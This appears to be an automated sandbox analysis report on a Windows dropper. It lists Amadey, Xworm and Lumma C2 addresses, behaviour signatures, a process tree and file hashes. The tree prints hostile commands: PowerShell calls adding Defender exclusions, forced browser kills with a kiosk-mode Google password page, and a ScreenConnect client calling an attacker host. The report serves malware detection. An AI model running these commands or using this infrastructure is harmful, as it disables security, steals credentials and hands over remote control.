Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 09:36

General

  • Target

    766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe

  • Size

    3.1MB

  • MD5

    74ba48529515c95320f4a86fc42fc668

  • SHA1

    c33b2b0c5e43e5ac274206ae964cf85bb8718048

  • SHA256

    766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa

  • SHA512

    16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8

  • SSDEEP

    98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

C2

87.120.112.33:8398

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

Extracted

Family

lumma

C2

https://processhol.sbs/api

https://p10tgrace.sbs/api

https://peepburry828.sbs/api

https://3xp3cts1aim.sbs/api

https://p3ar11fter.sbs/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 10 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 38 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
    "C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Users\Admin\AppData\Local\Temp\1006867001\ae1f140dbd.exe
        "C:\Users\Admin\AppData\Local\Temp\1006867001\ae1f140dbd.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2120
      • C:\Users\Admin\AppData\Local\Temp\1006868001\ee6c94c274.exe
        "C:\Users\Admin\AppData\Local\Temp\1006868001\ee6c94c274.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2916
      • C:\Users\Admin\AppData\Local\Temp\1006869001\0c3c2ef132.exe
        "C:\Users\Admin\AppData\Local\Temp\1006869001\0c3c2ef132.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1584
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1052
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2280
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1788
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2392
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.0.1980041515\1655493434" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1228 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e6946c4-c956-4add-a455-ecec750d9862} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 1300 10fd6e58 gpu
              6⤵
                PID:2472
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.1.1436625570\1371608418" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b247f95-9778-4092-a225-07b99a8381f4} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 1516 e71b58 socket
                6⤵
                  PID:2520
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.2.1935744822\1950471748" -childID 1 -isForBrowser -prefsHandle 2084 -prefMapHandle 2080 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e948e8df-aaea-4aa6-a550-f65ca896e70c} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 2096 1a3c2f58 tab
                  6⤵
                    PID:1808
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.3.708842068\104788742" -childID 2 -isForBrowser -prefsHandle 2956 -prefMapHandle 2952 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d40ce2-45a2-4596-9e5e-a628f8adb8a9} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 2968 e64b58 tab
                    6⤵
                      PID:1984
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.4.1012315112\1404219731" -childID 3 -isForBrowser -prefsHandle 3552 -prefMapHandle 3056 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e01bd58-cbe9-474a-8dee-c23a4fb7165e} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 3564 1c9e8658 tab
                      6⤵
                        PID:2208
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.5.279028253\1800956913" -childID 4 -isForBrowser -prefsHandle 3664 -prefMapHandle 3668 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18a2f49e-4137-4b8a-9900-2e197a565d8e} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 3652 1e89b258 tab
                        6⤵
                          PID:1132
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3064.6.629795120\1314682877" -childID 5 -isForBrowser -prefsHandle 3608 -prefMapHandle 3640 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {543e6a58-803d-4e4d-a290-b225fbcf647c} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" 3752 1ee75258 tab
                          6⤵
                            PID:1688
                    • C:\Users\Admin\AppData\Local\Temp\1006870001\8d83f60acf.exe
                      "C:\Users\Admin\AppData\Local\Temp\1006870001\8d83f60acf.exe"
                      3⤵
                      • Modifies Windows Defender Real-time Protection settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2796
                    • C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe
                      "C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Drops startup file
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Adds Run key to start application
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:3168
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3388
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3568
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3692
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3780
                    • C:\Users\Admin\AppData\Local\Temp\1006872001\SupportClientSetup.exe
                      "C:\Users\Admin\AppData\Local\Temp\1006872001\SupportClientSetup.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3512
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                        4⤵
                        • Enumerates connected drives
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        PID:3872
                • C:\Windows\system32\msiexec.exe
                  C:\Windows\system32\msiexec.exe /V
                  1⤵
                  • Enumerates connected drives
                  • Boot or Logon Autostart Execution: Authentication Package
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3908
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding 15D01CFCB1DCD9B6867D2400C0972717 C
                    2⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3976
                    • C:\Windows\SysWOW64\rundll32.exe
                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3F22.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259473358 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      3⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:4028
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding 9B608690C9DC99DBD9C1DDA80B575E6E
                    2⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3796
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding C7A449764376DC995742533EB718F40E M Global\MSI0000
                    2⤵
                    • Loads dropped DLL
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:2152
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                    PID:3316
                  • C:\Windows\system32\DrvInst.exe
                    DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005E0" "00000000000005DC"
                    1⤵
                    • Drops file in Windows directory
                    • Modifies data under HKEY_USERS
                    PID:3484
                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                    "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=2afab910-a215-431f-82ab-e05c395db9ee&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c="
                    1⤵
                    • Sets service image path in registry
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4060
                    • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                      "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "87e942be-756b-4e1d-a631-ef57f7ec927a" "User"
                      2⤵
                      • Executes dropped EXE
                      PID:3616
                    • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                      "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "432015fd-1a57-4b1c-b9d0-a8e10b34d368" "System"
                      2⤵
                      • Executes dropped EXE
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      • Modifies data under HKEY_USERS
                      PID:2624

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Config.Msi\f7778f9.rbs

                    Filesize

                    213KB

                    MD5

                    5c51188ddc8519bd9ab824d122827b48

                    SHA1

                    d2a03b450a0cb379c8f0cd82c19de59b92bb9bc3

                    SHA256

                    8815d298c6ee97a93536f9c6707700b05e56aae91ef53238c2431fc1f80ad031

                    SHA512

                    83a97a19c7d2c3f01c4624fd8d304ba65bd0ebf2905f4805b0897056c95b955b128007c2031c0c8725d6235598d577b9aa7cd389829eefc4071addd2a7761293

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources

                    Filesize

                    227B

                    MD5

                    dfd0bdff874bb29b508f15bdd35cb6a3

                    SHA1

                    de772d64129e084d150d8087ccdac16ef97fb185

                    SHA256

                    38bdcc2ec25e7464dde7293b5a6ec64eea4b9d9f6fb8c36fdcc5677a6f55b721

                    SHA512

                    6addfae10478871085c796f2af5a11cd78088fc49b245df2229db7546973ff9a16785c72bf61f569e16a3e79f7f48ef8c1badb91313271d9515af3d3b4b759b0

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources

                    Filesize

                    12KB

                    MD5

                    3e2aaeb2cea70c3508085356777faf2e

                    SHA1

                    aaa701d78f61b061ce143fc32fb73a4809f1a665

                    SHA256

                    c0350217c247e02bc32838fdd89ec3ed25bdc0b995c0fbae99a169a07989662d

                    SHA512

                    840bbf782e1956eaaa99304b5c7f17a9003da4844bce03fc27c493a187cf1e19d28333f6919816b43352c408047e963ad1c21a242aa85716746f200e57342dd7

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources

                    Filesize

                    48KB

                    MD5

                    d524e8e6fd04b097f0401b2b668db303

                    SHA1

                    9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

                    SHA256

                    07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

                    SHA512

                    e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources

                    Filesize

                    26KB

                    MD5

                    5cd580b22da0c33ec6730b10a6c74932

                    SHA1

                    0b6bded7936178d80841b289769c6ff0c8eead2d

                    SHA256

                    de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

                    SHA512

                    c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll

                    Filesize

                    192KB

                    MD5

                    ae0e6eba123683a59cae340c894260e9

                    SHA1

                    35a6f5eb87179eb7252131a881a8d5d4d9906013

                    SHA256

                    d37f58aae6085c89edd3420146eb86d5a108d27586cb4f24f9b580208c9b85f1

                    SHA512

                    1b6d4ad78c2643a861e46159d5463ba3ec5a23a2a3de1575e22fdcccd906ee4e9112d3478811ab391a130fa595306680b8608b245c1eecb11c5bce098f601d6b

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe

                    Filesize

                    93KB

                    MD5

                    361bcc2cb78c75dd6f583af81834e447

                    SHA1

                    1e2255ec312c519220a4700a079f02799ccd21d6

                    SHA256

                    512f9d035e6e88e231f082cc7f0ff661afa9acc221cf38f7ba3721fd996a05b7

                    SHA512

                    94ba891140e7ddb2efa8183539490ac1b4e51e3d5bd0a4001692dd328040451e6f500a7fc3da6c007d9a48db3e6337b252ce8439e912d4fe7adc762206d75f44

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll

                    Filesize

                    254KB

                    MD5

                    5adcb5ae1a1690be69fd22bdf3c2db60

                    SHA1

                    09a802b06a4387b0f13bf2cda84f53ca5bdc3785

                    SHA256

                    a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

                    SHA512

                    812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll

                    Filesize

                    822KB

                    MD5

                    be74ab7a848a2450a06de33d3026f59e

                    SHA1

                    21568dcb44df019f9faf049d6676a829323c601e

                    SHA256

                    7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

                    SHA512

                    2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config

                    Filesize

                    1KB

                    MD5

                    2744e91bb44e575ad8e147e06f8199e3

                    SHA1

                    6795c6b8f0f2dc6d8bd39f9cf971bab81556b290

                    SHA256

                    805e6e9447a4838d874d84e6b2cdff93723641b06726d8ee58d51e8b651cd226

                    SHA512

                    586edc48a71fa17cdf092a95d27fce2341c023b8ea4d93fa2c86ca9b3b3e056fd69bd3644edbad1224297bce9646419036ea442c93778985f839e14776f51498

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config

                    Filesize

                    949B

                    MD5

                    df5de516807a78cd5b80282a31aa2dad

                    SHA1

                    e0b3800819b77e7b313410c6c20c1d47dbe80b38

                    SHA256

                    0c2bca1705f12a54a7908bae7c9345a0b345318b95934d825f41abf811229159

                    SHA512

                    dad3ae167a1db03345d2bbf6cdb62ae17403b500ca9be701bc7eb266b9a3709385fa0214cf7df5626176a478c3b098ccbe3f3df75b74b0358eb58b036081a892

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\activity-stream.discovery_stream.json.tmp

                    Filesize

                    24KB

                    MD5

                    d0f6baa46fa688b5e595bc0326e753db

                    SHA1

                    01cd99ee6b2873955a69baec8f5e25544af5fb7b

                    SHA256

                    cc115d97e7af8e9f20b5da1f34dc050eb024fbe798a4196bc028da58d311f8ed

                    SHA512

                    74e24cae1d9a2270fe3a6fd92cfddc1617386bcd3c468365a499858e673b09c4c1c7b341b21277a027ea2c5297b6b6e14b1d7b7fa5d1fc592ca77f4bdb5194a7

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                    Filesize

                    13KB

                    MD5

                    f99b4984bd93547ff4ab09d35b9ed6d5

                    SHA1

                    73bf4d313cb094bb6ead04460da9547106794007

                    SHA256

                    402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

                    SHA512

                    cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

                  • C:\Users\Admin\AppData\Local\Temp\1006867001\ae1f140dbd.exe

                    Filesize

                    1.8MB

                    MD5

                    c3384cbcfd7f594f40fe489f5f67a36f

                    SHA1

                    37f8f298e7ef281a821e38cc08abb72d679c9b2d

                    SHA256

                    dbaa65c338340985131358f76f903a03045da28aaaa6297f37bf8f5123defcf2

                    SHA512

                    e68fc70a6bd04045e13712f95bee04070eeb2fc99cd02703eb15a583dfa49e0ee1e70a08b294072e0a6676cdaeb9e4dbd10fc06e6f3d8d7cf6ded951afc215ea

                  • C:\Users\Admin\AppData\Local\Temp\1006868001\ee6c94c274.exe

                    Filesize

                    1.7MB

                    MD5

                    a088750a78a264d0204488fe6bec85d6

                    SHA1

                    d7cc85364e6481188de1912ee35692f09a126f44

                    SHA256

                    d165a92f40ed9c2ec60c492ab46e9632e740d1af310215a6b464f82dd8418e21

                    SHA512

                    d00d35fff97f54d304a8f70b6916902987795124e7aeff103c248c2f7663bd61f8d9ed4985ceae8556cff308494c2063235aff7285f0892bea12850e802ca4ea

                  • C:\Users\Admin\AppData\Local\Temp\1006869001\0c3c2ef132.exe

                    Filesize

                    900KB

                    MD5

                    95821147e42ab35fdaf3ed0147f6e84c

                    SHA1

                    4e8b988e3d461eb5878d6a59b89a079570cec9ef

                    SHA256

                    eea6ddef3eb7b22725ef536cd859593e65ede2edf38955533b85bf0e1f1667f5

                    SHA512

                    5f4203170cab652dc91bdd39f35ca8ad88aa867a3edd089009ecd0ae441709766724e6e20307fe8e77d2a333ceece4db517e9d6e421ff8e129904b4ee7fb54fe

                  • C:\Users\Admin\AppData\Local\Temp\1006870001\8d83f60acf.exe

                    Filesize

                    2.6MB

                    MD5

                    20d45eddc965d7714b3412a9bf7ebe7e

                    SHA1

                    888e3f63a63cef84f8b4deb3ef570967725766af

                    SHA256

                    fcc5177127503eb837af31d6d1c483ad753da3c863c415224cc0c3b31911b331

                    SHA512

                    441911b9d3dbdac8a530420b40e7f4ebe7e9a3b68daab44156aa8a0c230267d7c8df9cc3aaf97c485d4969d6d63f33eeff88315dc0026bce68740cd4e977baff

